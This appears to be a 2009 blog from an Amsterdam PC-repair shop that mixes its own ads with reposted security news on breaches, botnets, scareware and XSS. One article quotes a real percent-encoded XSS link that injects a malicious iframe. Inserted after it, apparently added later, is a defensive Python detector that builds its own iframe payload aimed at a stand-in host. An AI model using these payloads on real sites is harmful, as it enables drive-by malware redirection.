Tuesday, 29 December 2009

Zeus Bot Removal

To clean yourself of Zeus, please contact us at iremove.nl

Saturday, 26 December 2009

iRemove Sales Page. Operating Systems List

Click Here To be Directed to A price list of Operating systems

Opening Day Special.
Merry Christmas

FIRST DAY OPENING TODAY !!

**NOW OPEN** PC Repair Amsterdam iRemove.nl, Virus & Malware Removal

NOW OPEN!!

Merry Christmas,
From today iRemove Amsterdam is fully active. Come visit us

http://iremove.nl

PC Repair Amsterdam, Virus & Malware Removal, Online Discount Antivirus/Antispam Programs, Fresh installations of Various Operating Systems, including Windows 7 All Versions.

Advanced Online Protection Tutorials

Remote Assistance

Contact us for information on easy upgrade from home, very cheap & fast service. All Versions of Microsoft Platforms available.

Free Travel costs (Amsterdam) & Online Diagnostics.



infected@iremove.nl

Thursday, 17 December 2009

Texas company lays out 'hacking' case against Minnesota Public Radio

By David Brauer
minnpost.com
Dec 15 2009

Do Minnesota Public Radio and reporter Sasha Aslanian realistically face
civil and criminal penalties after uncovering a Texas firm’s security
breaches involving state of Minnesota job-seeker data?

Lookout Services - which acknowledges an October security breach and
subsequent security weaknesses - claimed in a Dec. 14 statement that
their data was "illegally compromised." The company - which notes "only
the Minnesota Public Radio reporter viewed" some data and wants MPR to
disclose what was viewed - will "aggressively seek prosecution for this
egregious act," according to the statement.

In a Dec. 11 report, Aslanian said she was able to see "employee names,
birth dates, Social Security numbers and hire dates" on Lookout's web
site "without using a password or encryption software."

Lookout CEO Elaine Morley says that’s not the whole truth. She contends
Aslanian did use a password and ID to penetrate Lookout's security - and
told Morley so during a Dec. 7 phone call. Later, Morley asserts,
Aslanian used information from that penetration to view the state data,
even though she didn’t need a password or encryption that time.

Spymaster sees Israel as world cyberwar leader

By Dan Williams
TEL AVIV
Reuters
Dec 15, 2009

TEL AVIV (Reuters) - Israel is using its civilian technological advances
to enhance cyberwarfare capabilities, the senior Israeli spymaster said
on Tuesday in a rare public disclosure about the secret program.

Using computer networks for espionage -- by hacking into databases -- or
to carry out sabotage through so-called "malicious software" planted in
sensitive control systems has been quietly weighed in Israel against
arch-foes like Iran.

In a policy address, Major-General Amos Yadlin, chief of military
intelligence, listed vulnerability to hacking among national threats
that also included the Iranian nuclear project, Syria and Islamist
guerrillas along the Jewish state's borders.

Yadlin said Israeli armed forces had the means to provide network
security and launch cyber attacks of their own.

"I would like to point out in this esteemed forum that the cyberwarfare
field fits well with the state of Israel's defense doctrine," he told
the Institute for National Security Studies (INSS), a Tel Aviv
University think tank.

Five things you need to know about Social Engineering

By Robert McMillan
IDG News Service
December 16, 2009

SOCIAL ENGINEERING IS GROWING UP. Social engineering, the act of
tricking people into giving up sensitive information, is nothing new.
Convicted hacker Kevin Mitnick made a name for himself by cold-calling
staffers at major U.S. companies and talking them into giving him
information. But today's criminals are having a heyday using e-mail and
social networks. A well-written phishing message or virus-laden spam
campaign is a cheap, effective way for criminals to get the data they
need.

TARGETED ATTACKS ARE ON THE RISE. Northrop Grumman recently reported
that China was "likely" stealing data from the United States in a "long-
term, sophisticated network exploitation campaign." Security experts
have noticed criminals were "spear phishing"--getting Trojan horse
programs to run on a victim's computer by using carefully crafted e-mail
messages. Used to steal intellectual property and state secrets, spear
phishing is now everywhere.

CASTING A BROAD NET PAYS OFF TOO. Less discriminating criminals cast a
wider net with their attacks. They pick e-mail subjects everybody's
interested in: a message from the IRS, or even "a photo of you." The
more victims who click links and install the bad guy's software, the
more money the criminals make. Right now, "they're doing it with
messaging that is extremely broad," says Gary Warner, director of
research in computer forensics at the University of Alabama at
Birmingham.
FREE STUFF CAN BE COSTLY. Attackers love to tempt people with freebies, security experts say. "The bait that works best is a popular device," says Sherri Davidoff, a penetration tester hired to see if she can break into corporate networks. One of Davidoff's most successful techniques: a fake employee survey. Victims fill it out thinking they'll qualify to win an iPod if they hand over sensitive information. "Thirty to 35 percent will enter their usernames and passwords to get the iPhone," she says.

PEOPLE TRUST THEIR (HACKED) FRIENDS. That trust allowed the Koobface worm to spread throughout Facebook and led to a rash of direct-message attacks on Twitter too. It's all part of the next round of socially-engineered attacks, says Steve Santorelli, formerly a Scotland Yard detective and now director of global outreach at Team Cymru. A few years ago hackers were more focused on the quality of their code. Now, he says, "they are putting an equal effort into social engineering."

Botnet Operators Infecting Servers, Not Just PCs

By Kelly Jackson Higgins
DarkReading
Dec 16, 2009

Botnet operators have always been able to easily infect and convert PCs
into bots, but they also are increasingly going after servers -- even
building networks of compromised servers.

Web servers, FTP servers, and even SSL servers are becoming prime
targets for botnet operators, not as command and control servers or as
pure zombies, but more as a place to host their malicious code and
files, or in some cases to execute high-powered spam runs.

"FTP servers are a hot commodity in the underground. They are regularly
used by drive-by download malware as well as a downloading component for
regular bots," says Mikko Hypponen, chief research officer at F-Secure.
"Another thing we've noticed is the use of SSL servers. Sites with a
valid SSL certificate get hacked and are used by drive-by-downloads."

Why SSL servers? "If a drive-by download gets the malware file through
an HTTPS connection, proxy and gateway scanners won't be able to scan
for the malware in transit, making it easier to sneak in," Hypponen
explains.

Wednesday, 16 December 2009

Attacks spread malware with help from AppleInsider

Malware purveyors are exploiting web vulnerabilities in appleinsider.com, lawyer.com, news.com.au and a dozen other sites to foist rogue anti-virus on unsuspecting netizens.

The ongoing attacks are notable because they use exploits based on XSS, or cross-site scripting, to hide malware links inside the URLs of trusted sites. That's something application security expert Mike Geide doesn't see often. As a result, people who expect to visit sites they know and trust are connected to a page that tries to trick them into thinking their computer is infected.

"What's interesting ... is the fact that it's embedding iframes to redirect people," Geide, who is a senior security researcher at Zscaler, told The Register. "Typically, cross-site scripting is just that - it embeds script tags so it will embed javascript to run."

The malicious links are blasted out on web forums and typically look something like:

hxxp://lawyers.com/find_a_lawyer/content_search/results.php?sCHRISTINA%AGUILERA%20ANOREXIC%20PICS%3C%2F%74%69%74%6C%65%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%2F%2F%61%73%6B%35%2E%65%75%3E

The last chunk of text is hexadecimal-encoded HTML that redirects users to ask5 .eu (a space has been added for your protection). A series of redirect links ultimately leads to a site that looks similar to a Microsoft Windows screen with a popup claiming the PC is overrun with malware. The user is prompted to download rogue anti-virus to fix the imaginary problem.

While it's not the most convincing attack we've ever seen, there's nothing to stop attackers from using the same technique to push web-based exploits, say the Adobe Reader zero-day attack that's now circulating in the wild.

The links work because appleinsider.com and the rest of the sites being abused fail to filter out harmful characters used in XSS attacks.
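A defender-side check for the URL pattern described above, written as an added example (it is not code from the article or from Zscaler): it percent-decodes a URL's query string, flags HTML tags that have no business inside a search parameter, pulls out any injected iframe target, and shows the escaping a site should apply before echoing a search term back into its page. The sample URLs and the domain evil.example are constructed for the example.

```python
import html
import re
from urllib.parse import urlsplit, unquote

# Tags that should never appear inside a search-term parameter. A legitimate
# query string carries text, not markup, so any hit is worth investigating.
SUSPICIOUS_TAG = re.compile(
    r"<\s*/?\s*(iframe|script|title|object|embed|img|svg)\b[^>]*>",
    re.IGNORECASE,
)

# Pulls the src target out of an injected <iframe ...> so it can be blocked
# or looked up, the way the article traces the encoded link to ask5 .eu.
IFRAME_SRC = re.compile(
    r"<\s*iframe[^>]*\bsrc\s*=\s*['\"]?([^'\" >]+)",
    re.IGNORECASE,
)

# Constructed sample: a benign-looking search URL whose tail is percent-encoded
# HTML that closes the page <title> and opens an <iframe> to evil.example.
CONSTRUCTED_MALICIOUS = (
    "http://www.example.com/find/results.php?s=SOME%20SEARCH%20TERM"
    "%3C%2F%74%69%74%6C%65%3E"                          # </title>
    "%3C%69%66%72%61%6D%65%20%73%72%63%3D%2F%2F"        # <iframe src=//
    "%65%76%69%6C%2E%65%78%61%6D%70%6C%65%3E"           # evil.example>
)

# Constructed sample: an ordinary search on the same page.
CONSTRUCTED_BENIGN = "http://www.example.com/find/results.php?s=family%20law%20attorney"


def decode_query(url, max_rounds=3):
    """Return the fully percent-decoded query string of a URL.

    Decoding is repeated because attackers sometimes double-encode; it stops
    as soon as a round no longer changes anything. Invalid escapes such as
    the article's '%AG' are left untouched by urllib, which is what we want.
    """
    query = urlsplit(url).query
    for _ in range(max_rounds):
        decoded = unquote(query)
        if decoded == query:
            break
        query = decoded
    return query


def injected_tags(decoded_query):
    """List every suspicious HTML tag found in the decoded query string."""
    return [m.group(0) for m in SUSPICIOUS_TAG.finditer(decoded_query)]


def iframe_targets(decoded_query):
    """List the src targets of any injected iframes (scheme-relative or not)."""
    return [m.group(1) for m in IFRAME_SRC.finditer(decoded_query)]


def assess_url(url):
    """Decode a URL's query and report whether it carries injected markup."""
    decoded = decode_query(url)
    tags = injected_tags(decoded)
    return {
        "decoded_query": decoded,
        "injected_tags": tags,
        "iframe_targets": iframe_targets(decoded),
        "suspicious": bool(tags),
    }


def render_search_term(term):
    """The fix the abused sites lacked: escape the term before echoing it.

    html.escape turns < > & " ' into entities, so a reflected search term can
    no longer close the <title> element or open an <iframe>.
    """
    return html.escape(term, quote=True)


if __name__ == "__main__":
    for sample in (CONSTRUCTED_MALICIOUS, CONSTRUCTED_BENIGN):
        report = assess_url(sample)
        print(sample)
        print("  decoded :", report["decoded_query"])
        print("  tags    :", report["injected_tags"])
        print("  iframes :", report["iframe_targets"])
        print("  verdict :", "SUSPICIOUS" if report["suspicious"] else "clean")
    print("escaped :", render_search_term("</title><iframe src=//evil.example>"))
```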

More about the attack is available from the Zscaler blog here.

One Of The 32 Million With A RockYou Account? You May Want To Change All Your Passwords. Like Now.

By MG Siegler
TechCrunch.com
December 14, 2009

It's no secret that most people use the same password over and over
again for most of the services they sign up for. While it's obviously
convenient, this becomes a major problem if one of those services is
compromised. And that looks to be the case with RockYou, the social
network app maker.

Over the weekend, the security firm Imperva issued a warning to RockYou
that there was a serious SQL Injection flaw in their database. Such a
flaw could grant hackers access to the service's entire list of user
names and passwords in the database, they warned. Imperva said that
after it notified RockYou about the flaw, it was apparently fixed over
the weekend. But that's not before at least one hacker gained access to
what they claim is all of the 32 million accounts. 32,603,388 to be
exact. The best part? The database included a full list of unprotected
plain text passwords. And email addresses. Wow.

The hacker has posted a sample of what they found. They have blanked out
the passwords for now, but warn, "Don't lie to your customers, or i
will publish everything." As far as we can tell, RockYou hasn't issued a
warning about this to its users yet. We've reached out to the company,
but have yet to hear back.

Not another Stolen Laptop

BBC News
12 December 2009

An investigation is under way after a laptop containing secret data was
stolen from the Ministry of Defence.

It was taken from the ministry's headquarters in Whitehall, central
London in late November, along with a key used to decode encrypted
files.

A spokesman said an investigation by MoD police was ongoing.

Shadow defence secretary Liam Fox said the theft was "extremely
worrying". The incident is the latest in a string of thefts involving
MoD laptops.

Figures from the department earlier this year showed that 28 had been
lost or stolen between 1 January and 11 May.

And last July, the MoD admitted that 658 of its laptops had been stolen
in the past four years.

Bank's antifraud tactics stun security expert: How much do they know?

By Ellen Messmer
Network World
12/14/2009

Checking out of a Hilton hotel in London, security expert Roger Thompson
was told his Visa card had been declined due to suspicions it was
stolen, a situation that only got more disconcerting when he learned the
bank that issued the card had more personal information on him and his
family members than he ever imagined.

In a tale he relates in his blog, Thompson, chief research officer at
AVG, said he was compelled to answer questions on the phone from a
Wachovia Bank representative in its fraud-prevention division to prove
he was really Roger Thompson and not a credit-card thief checking out of
the London hotel.

It turns out Thompson's Visa card was flagged and suspended because he
hadn't told the bank he was travelling overseas, a requirement he didn't
know the bank had. But the "scary bit" about it all, he says, is that
the bank fraud-prevention representative didn't just ask him to give the
correct answers to questions such as his mother's maiden name, which he
had provided to the bank for fraud detection purposes, but also a host
of other questions about his daughter-in-law that he had no idea it
knew.

"I was in shock," Thompson says about what he found out that Wachovia
Bank had stored "at their fingertips" related to his daughter-in-law --
information Thompson thinks the bank may have found out through
Facebook.

Monday, 14 December 2009

Get your HitmanPro Here. **NEW ANTIVIRUS SOFTWARE**

http://www.surfright.nl/en/shop?rc=9599818

Hitman Pro Available Through iRemove Amsterdam

32% of Computers Still Infected, Despite Presence of Antivirus Program

Hengelo, December 9, 2009. Computer users assume that the popular antivirus programs will protect them against malware (viruses, spyware, Trojans, etc). But our research shows this is not correct. Over 100,000 computers were scanned using our award-winning product, Hitman Pro 3, and almost 32% of the users that have an up-to-date antivirus program installed are still infected with malware.

"Our research shows that traditional antivirus programs cannot keep up with the cyber criminals", according to CEO Mark Loman. "Despite all their efforts, suppliers of antivirus programs release a solution days, sometimes weeks, after a new malware instance is released."

Mark Loman continues: "Our research also shows that not all antivirus programs detect the same threats. A combination of different antivirus programs would reduce the number of infections dramatically. This security strategy is already used successfully at the enterprise level, but has been difficult to implement for home users due to the increased resource requirements needed to run multiple antivirus programs and conflicts between different antivirus programs, both of which can adversely affect computer performance."

Hitman Pro 3 allows home users to use the detection and removal capabilities of multiple antivirus programs incorporated into one seamless solution, because the 7 antivirus programs are available via Internet (the Scan Cloud).
Research Results

107,435 computer users have used the free version of Hitman Pro 3 for the first time in the period from October 10 to December 4.
78,828 users had an up-to-date antivirus program installed. 28,607 users had not.
25,038 (32%) of the 78,828 users with up-to-date antivirus program were infected with malware.
13,002 (46%) of the 28,607 users without up-to-date antivirus program were infected with malware.

These 107,435 users have scanned their computer using the Behavioural Scan in Hitman Pro 3. All potential malware instances were submitted to the SurfRight Scan Cloud for further analysis. All of these malware samples were gathered in the period from October 10 to December 4 (55 days) in order to reflect actual malware samples "in the wild" and not a collection of "old" malware examples.
Top 10 of found malware

Rank  Malware       Infected Computers
 1.   Generic       34,845
 2.   FakeAV        13,050
 3.   Alureon        5,915
 4.   Delf           4,116
 5.   Virut          2,868
 6.   Vundo          2,421
 7.   Small          2,342
 8.   OneStep        2,093
 9.   OnLineGames    1,946
10.   Swizzor        1,854

The large number of generics is an indication that AV vendors are trailing behind in releasing signatures to detect new variants of malware. For example: The TDSS rootkit is in the top 3 of malware that Hitman Pro 3 detected last month. We received the first sample of TDSS/Alureon rootkit from a victim’s machine in our Scan Cloud on October 30, 2008. More than one year later, this particular rootkit sample still beats every major AV product.
Research Results

* It is not sufficient to assume you are protected if you have an antivirus program on your PC. Scan your PC regularly with a product from a different vendor for a second opinion.
* Do not simply extend the subscription of your antivirus program when it expires. In most cases it is better to upgrade to the latest version, as newer versions are in general better equipped to battle the newest sophisticated threats.
* Although vendors of antivirus programs are able to detect sophisticated threats, not all are able to remove them completely.

Click here for a detailed description of the research results and the methodology.
Hitman Pro 3

Hitman Pro 3 can scan a computer in only a few minutes from a USB Flash Drive, CD/DVD, local or network attached hard drive and will quickly reveal the presence of any malware using a Behavioural Scan. The actual verification of these potential malware files is then done on the Hitman Pro servers, the "Scan Cloud", which incorporates a hosted multi-vendor scanning service. Hitman Pro 3 uses 7 different antivirus programs to analyse the suspicious files.

Hitman Pro 3 can be used in addition to your existing antivirus program. Scanning your PC is free so Hitman Pro 3 is an ideal solution to check if your current antivirus program is protecting you sufficiently. A free version can be downloaded from www.hitmanpro.com
About SurfRight

SurfRight B.V. was founded in 2008, based on the freeware project Hitman Pro 1 and 2 with a user base of more than 3 million users. SurfRight is dedicated to the development of smart, efficient and user-friendly security solutions for the average computer user. Hitman Pro 3 and the Caretaker product family include solutions against unsolicited mail (spam), online fraud (phishing), viruses and other malware.

Stolen bank data mixed into list of French tax dodgers

By John Leyden
The Register
11th December 2009

The legality of a French crackdown on suspected tax evaders earlier this
year has been thrown into doubt after it emerged that stolen data was
among the mix of information used by financial investigators.

A list of 3,000 French nationals suspected of using Swiss banking
secrecy to evade paying taxes included data handed over by a former IT
worker for HSBC in Switzerland - without the bank's permission - to the
French authorities.

In a statement, HSBC in Switzerland confirmed a worker suspected of
stealing information from the bank between 2006 and 2007 was prosecuted
last year. The data involved less than 10 accounts held by Geneva-based
HSBC Private Bank, according to HSBC. It's unclear whether the unnamed
worker involved was convicted of any offence. French daily Le Parisien
reports that the former bank staffer has fled to France and is living
under judicial protection.

French daily Le Figaro claimed on Friday that up to 4,000 French clients
of the bank, collectively holding €6 billion ($8.8 billion) in assets in
Switzerland, were named on the stolen list. Only an unspecified
proportion of those named on the list (which sounds like a data dump,
perhaps indexed by a residential address in France) are suspected of tax
evasion.

Digital dangers in a wired world

By Lim Mi-jin, Kim Jeen-kyung
JoongAng Daily
December 14, 2009

It's the stuff of action flicks. In "Live Free or Die Hard," terrorists
paralyze the United States by taking over all transportation systems,
broadcasting, communications and the power grid. It’s a total shutdown
and only Bruce Willis can save the world from the evil hackers.

But the plot’s not a total fiction.

In today’s interconnected world, system after system can collapse if a
central computing facility such as a supervisory control and data
acquisition, or Scada, system fails. These Scada systems collect data from
sensors at plants and other remote locations and then send that data to a
central computer that manages and controls it.

So what we saw in the last Die Hard movie has actually already been
experienced. Ask the Poles. In January last year, a subway train
derailed in Lodz injuring several passengers after a 14-year-old boy
hacked into the railway operation system. And look at what happened in
the United States in August 2003 when a virus called a "Blaster Worm"
found its way into the Scada for the power grid in the northeast of the
U.S. Around 5,000 people in seven states were injured in the ensuing
blackout. "Once you hack into the Scada, you can manipulate all the
water, electricity and gas supply systems," said Park Chan-am, 20, the
winner of a hacking protection competition held in Korea this year, part
of Codegate 2009, an international event.

Korea has already installed Scada systems in most facilities across the
country. These facilities control everything from reserving train
tickets to supplying electricity and air-conditioning. They even control
the floodgates of multipurpose dams and the quality of tap water in
Seoul.

And we have seen what can happen when things go wrong. On Nov. 27, the
electric power in the Korea Railroad Corporation building in
Bongnae-dong, central Seoul, went off at 5:21 p.m. Within a minute,
Korail had supplied emergency electric power but all systems for issuing
train tickets nationwide were halted for nearly two hours because the
computer server managing train ticket reservations and issuance that was
installed in the Korail building malfunctioned.

The situation was not life threatening but it caused a major
inconvenience for passengers trying to buy tickets.

Korea's largest Scada system in scale is Korea Electric Power
Corporation’s "smart grid," which will be test run from 2011. The system
will have sensors and cameras installed in existing power plants and
power grids. Those sensors and cameras are going to allow Scada to
control the volume of regional power supply and demand. In that way, the
proper amount of electricity is expected to be provided to each region
at the right time.

Experts say this measure could save energy but electric power supply
operation across the country could be paralyzed if the Scada is
compromised. "It is almost impossible to hack into the smart grid system
because it is operated by a remote Internet network and it has advanced
security facilities attached," said an official at Kepco who asked not
to be identified.

However, experts in the security industry said the system could be
breached. Security experts say safeguard measures have to be included in
a law related to the establishment of the smart grid. They cite the
example of an employee from a company in charge of disposing of garbage
who penetrated the Scada and released a large amount of waste into a river
in Queensland, Australia. Apparently he had a grudge against the local
council.

"Terrible damage, such as a large-scale power blackout, is highly likely
if the system is attacked by hackers," said Lim Jong-in, a professor at
Korea University’s Graduate School of Information Management and
Security. "The planned bill has to be revised in order to arrange for a
high security budget and secure human resources."

New version of 20 top security controls is available

By William Jackson
GCN.com
Dec 10, 2009

Version 2.3 of the Consensus Audit Guidelines, the top 20 critical
security controls agreed on by a consortium of private and government
security experts, has been released and is available on the Web site of
the SANS Institute.

The consortium includes the National Security Agency, the U.S. Computer
Emergency Readiness Team, and agencies from the departments of Defense,
State and Energy, in addition to commercial forensics experts and white
hat hackers. The controls are intended to help large enterprises
prioritize and automate efforts to block known attacks and identify
intrusions. They include 15 automated controls and five additional
controls that cannot be automated to the same degree.

Call for papers i-Society 2010

CALL FOR PAPERS

*******************************************************************
International Conference on Information Society (i-Society 2010),
Technically Co-Sponsored by IEEE UK/RI Computer Chapter
28-30 June, 2010, London, UK
www.i-society.eu
*******************************************************************

The International Conference on Information Society (i-Society 2010) is
Technically Co-Sponsored by IEEE UK/RI Computer Chapter. The i-Society
is a global knowledge-enriched collaborative effort that has its roots
from both academia and industry. The conference covers a wide spectrum
of topics that relate to information society, which includes technical
and non-technical research areas.

The mission of i-Society 2010 conference is to provide opportunities for
collaboration of professionals and researchers to share existing and
generate new knowledge in the field of information society. The
conference encapsulates the concept of interdisciplinary science that
studies the societal and technological dimensions of knowledge evolution
in digital society. The i-Society bridges the gap between academia and
industry with regards to research collaboration and awareness of current
development in secure information management in the digital society.

The topics in i-Society 2010 include but are not confined to the
following areas:

*New enabling technologies
- Internet technologies
- Wireless applications
- Mobile Applications
- Multimedia Applications
- Protocols and Standards
- Ubiquitous Computing
- Virtual Reality
- Human Computer Interaction
- Geographic information systems
- e-Manufacturing

*Intelligent data management
- Intelligent Agents
- Intelligent Systems
- Intelligent Organisations
- Content Development
- Data Mining
- e-Publishing and Digital Libraries
- Information Search and Retrieval
- Knowledge Management
- e-Intelligence
- Knowledge networks

*Secure Technologies
- Internet security
- Web services and performance
- Secure transactions
- Cryptography
- Payment systems
- Secure Protocols
- e-Privacy
- e-Trust
- e-Risk
- Cyber law
- Forensics
- Information assurance
- Mobile social networks
- Peer-to-peer social networks
- Sensor networks and social sensing

*e-Learning
- Collaborative Learning
- Curriculum Content Design and Development
- Delivery Systems and Environments
- Educational Systems Design
- e-Learning Organisational Issues
- Evaluation and Assessment
- Virtual Learning Environments and Issues
- Web-based Learning Communities
- e-Learning Tools
- e-Education

*e-Society
- Global Trends
- Social Inclusion
- Intellectual Property Rights
- Social Infonomics
- Computer-Mediated Communication
- Social and Organisational Aspects
- Globalisation and developmental IT
- Social Software

*e-Health
- Data Security Issues
- e-Health Policy and Practice
- e-Healthcare Strategies and Provision
- Medical Research Ethics
- Patient Privacy and Confidentiality
- e-Medicine

*e-Governance
- Democracy and the Citizen
- e-Administration
- Policy Issues
- Virtual Communities

*e-Business
- Digital Economies
- Knowledge economy
- eProcurement
- National and International Economies
- e-Business Ontologies and Models
- Digital Goods and Services
- e-Commerce Application Fields
- e-Commerce Economics
- e-Commerce Services
- Electronic Service Delivery
- e-Marketing
- Online Auctions and Technologies
- Virtual Organisations
- Teleworking
- Applied e-Business
- Electronic Data Interchange (EDI)

*e-Art
- Legal Issues
- Patents
- Enabling technologies and tools

*e-Science
- Natural sciences in digital society
- Biometrics
- Bioinformatics
- Collaborative research

*Industrial developments
- Trends in learning
- Applied research
- Cutting-edge technologies

*Research in progress
- Ongoing research from undergraduates, graduates/postgraduates and
professionals

Important Dates:
Paper Submission Date: January 31, 2010
Notification of Paper Acceptance / Rejection: February 28, 2010
Camera Ready Paper Due: March 15, 2010
Early Bird Attendee registration: January 01, 2010
Late Bird Attendee registration: February 28, 2010
Conference Dates: June 28-30, 2010

For more details, please visit www.i-society.eu

Heartland Executives Told the Truth, Judge Says

By Robert McMillan
IDG News Service
Dec 10, 2009

Top executives at Heartland Payment Systems spoke truthfully about the
state of security at the company, a federal judge said earlier this week
before dismissing a class-action lawsuit against the payment processor.

The shareholder lawsuit, filed in March, was dismissed Monday by Judge
Anne Thompson of the U.S. District Court for the District of New Jersey.

Heartland was sued by shareholders after its stock dropped nearly 80
percent following the largest data breach in U.S. history. The
plaintiffs in the case say that Heartland executives lied when asked
about the state of the company's security in earnings conference calls
and by failing to disclose a 2007 SQL injection attack on its payroll
system in Securities and Exchange Commission filings.

That December 2007 SQL injection attack was important because it gave
criminals a back door into the company's payment processing system, the
plaintiffs alleged. Ultimately hackers stole more than 130 million
credit card numbers.

But in her opinion, Judge Thompson said that because Heartland had not
confirmed the credit card hack until January 2009, the company's
executives were telling the truth when they told investors that they
took security seriously.

Thursday, 10 December 2009

Scareware Fake MS endorsement

Scareware wronguns have developed a neat but evil piece of coding trickery designed to dupe prospective marks into believing that Microsoft is endorsing their worthless scamware.

A rogue anti-malware product called DefenceLab redirects infected PCs to Microsoft's Support portal, but modifies the HTML content as it returns so as to appear as if Microsoft is endorsing the worthless software. The ploy, which follows a fake scan and bogus Windows Security Center alert, is designed to persuade Windows users already exposed to infection by agents of the scareware package to pay for a full version of the supposed clean-up utility.

Surfers visiting the URL on the Windows Support site referenced in the scareware from a clean PC will get a 404 'page not found' message. Hacked PC victims will see an apparent endorsement.

Screenshots of the attack in action can be found in a blog post by anti-spyware firm Sunbelt Software, which was the first to warn of the threat, here.

The ruse is a development of earlier trickery that involved hacking the hosts file on compromised computers in order to hijack web surfing sessions. An earlier attack using this technique redirected Microsoft queries to a hacked UK-based computer, as explained in a blog posting by AVG's Roger Thompson here.

Prevx U-turn

Updated: PrevX has backtracked on earlier claims that a Windows update caused Windows machines to lock up with a so-called "Black Screen of Death".

An updated blog post from the UK-based software security firm withdraws earlier claims that a recent Microsoft update caused a glitch that resulted in affected PCs displaying only the My Computer folder on a blank screen. PrevX's new line is that changes in the Windows Registry that trigger the behaviour might be caused by malware or some other factor, which it is yet to pin down, but not the Windows update that it earlier held culpable.

Having narrowed down a specific trigger for this condition we've done quite a bit of testing and re-testing on the recent Windows patches including KB976098 and KB915597 as referred to in our previous blog. Since more specifically narrowing down the cause we have been able to exonerate these patches from being a contributory factor.

PrevX apologised for earlier pointing the finger of blame towards Redmond, adding that whatever the cause of the problem it has a fix.

We apologize to Microsoft for any inconvenience our blog may have caused. This has been a challenging issue to identify. Users who have the black screen issue referred to can still safely use our free fix tool to restore their desktop icons and task bar.

A blog posting by Microsoft Security Response, about research in Redmond that appears to have contributed to PrevX's volte-face, clearly states that the "Black Screen" reported by PrevX was not caused by Microsoft's updates.

We’ve conducted a comprehensive review of the November Security Updates, the Windows Malicious Software Removal Tool, and the non-security updates we released through Windows Update in November. That investigation has shown that none of these updates make any changes to the permissions in the registry. Thus, we don’t believe the updates are related to the "black screen" behaviour described in these reports.

Redmond adds that it hadn't received many reports of users getting clobbered by the problem, adding that previous instances of "black screen" behaviour have been associated with some malware families such as Daonol.

PrevX wasn't able to supply a screengrab illustrating the latest outbreak of "black screen" lock-ups in response to our request on Wednesday morning. PrevX's initial warning about the "Black Screen of Death" was widely reported by El Reg and many other media outlets, however it's unclear how many people have actually been affected.

No other security firm we're aware of bar PrevX has issued an advisory on the issue, and several others have privately expressed skepticism about at least the extent of the problem. ®

Update

In an updated blog post on Tuesday, PrevX fought back against suggestions that it had overstated the scope of the Black Screen of Death glitch. Mel Morris, PrevX chief exec, said its free Black Screen fix tool had been downloaded more than 50,000 times since its publication last Friday.

Morris also criticised the media for misinterpreting PrevX's original warning by taking material out of context and causing "inconvenience for Microsoft".

However, PrevX's original advisory is pretty clear in pointing blame towards recent Microsoft patches, KB915597 and KB976098, now ruled as blameless. Malware or problems between Windows and third-party software don't get a mention.

Default Windows 7 less secure than Vista

Windows 7 is less secure out-of-the box than Vista, despite Redmond's protestations to the contrary, a top security firm has claimed.

Trend Micro said that the default configurations of Windows 7 are less secure than Vista. Raimund Genes, CTO of Trend Micro, said that Windows 7 had sacrificed security for usability - at least for default configurations.

"I'm not saying Windows 7 is insecure, but out of the box Vista is better," Genes told El Reg.

The User Account Control (UAC) feature that debuted with Vista was a security safeguard that asked users for permission before allowing applications to run. The nagware technology irked users and was blamed for producing numerous largely meaningless pop-ups that users blithely clicked past.

Even senior Microsoft execs, for example UK security advisor Ed Gibson, have taken to describing the technology disparagingly as "User Annoyance Control" over recent months. A toned down version of UAC has been developed for Windows 7, but Genes regards this and other changes as a step backwards.

"I was disappointed when I first used a Windows 7 machine that there was no warning that I had no anti-virus, unlike Vista," Genes said. "There are no file extension hidden warnings either. Even when you do install anti-virus, warnings that it has not been updated are almost invisible."

"Windows 7 may be an improvement in terms of usability but in terms of security it's a mistake, though one that isn't that surprising. When Microsoft's developers choose between usability and security, they will always choose usability," Genes argued.

Genes said the security of Windows 7 for consumers might be improved by offering virtual XP, a sandboxed version of the older OS, with Windows 7 home editions. The virtualisation technology (criticised by other security firms, most notably Sophos, as a security risk in its own right because it needs separate patching and security protection) was only released in enterprise versions of the operating system.

Trend's unfavorable default security comparison between Vista and Windows 7 was released alongside its Trend Micro 2010 Future Threat Report. The report's main focus is the security implications of the wider IT industry shift towards cloud computing and virtualisation.

While offering significant benefits and cost-savings, the architectural shift means cybercrooks are likely to turn their sights towards manipulating the connection to the cloud, or attacking the data center and cloud itself, instead of trying to infect desktop or server systems.

"The focus for security firms has been protecting desktops or servers, but this needs to shift to providing security for the cloud, where sensitive information such as credit card records will be held. Using encryption to establish shielded containers for sensitive data and improving the security and back-up of cloud computing systems needs to be improved so that we can have safe cloud computing," Genes explained.

Zeus bot found using Amazon's EC2 as C&C server

Add Amazon's EC2 to the roster of cloud-based services being exploited to do the bidding of malware gangs.

Over the past few days, a new variant of the Zeus banking trojan has been spotted using the popular Amazon service as a command and control channel for infected machines. After marks get tricked into installing the password-logging malware, their machines begin reporting to EC2 for new instructions and updates, according to researchers from CA's internet security business unit.

"We believe this was a legitimate service that was purchased and compromised via a vulnerability" such as a weak password, Don DeBolt, CA's director of threat research, told The Reg. "It could have been any vulnerable system on the internet."

Over the past few months, accounts on Twitter, Google's app engine, and Facebook have also been transformed into master control channels for machines under the spell of surreptitious malware. In addition to their high availability and low cost, the sites are attractive because they don't set off alarms when infected machines are observed connecting to them.

While it's relatively easy to block channels located in China or based on internet relay chat, blacklisting some of the world's most popular online destinations is another matter completely.

According to analysis from Zero Day blogger Dancho Danchev, the cybercriminals behind Zeus appear to have plugged into Amazon's Relational Database Service as a backend alternative in case they lose access to their original domain.

DeBolt said the EC2 channel was disconnected after it was brought to the attention of Amazon officials. People who want to report future abuse of cloud-based services offered by the online retailer can use this link. An Amazon spokeswoman didn't respond to an email requesting comment. ®

Potent malware link infects almost 300,000 webpages

A security researcher has identified a new attack that has infected almost 300,000 webpages with links that direct visitors to a potent cocktail of malicious exploits.

The SQL injection attacks started in late November and appear to be the work of a relatively new malware gang, said Mary Landesman, a researcher with ScanSafe, a web security firm recently acquired by Cisco Systems. Hacked sites contain an invisible iframe that silently redirects users to 318x .com (a space has been added to protect the clueless), which goes on to exploit known vulnerabilities in at least five applications.

At time of writing, this web search showed more than 294,000 webpages that contained the malicious script. Infected sites included yementimes .com, parisattitude .com and knowledgespeak .com.

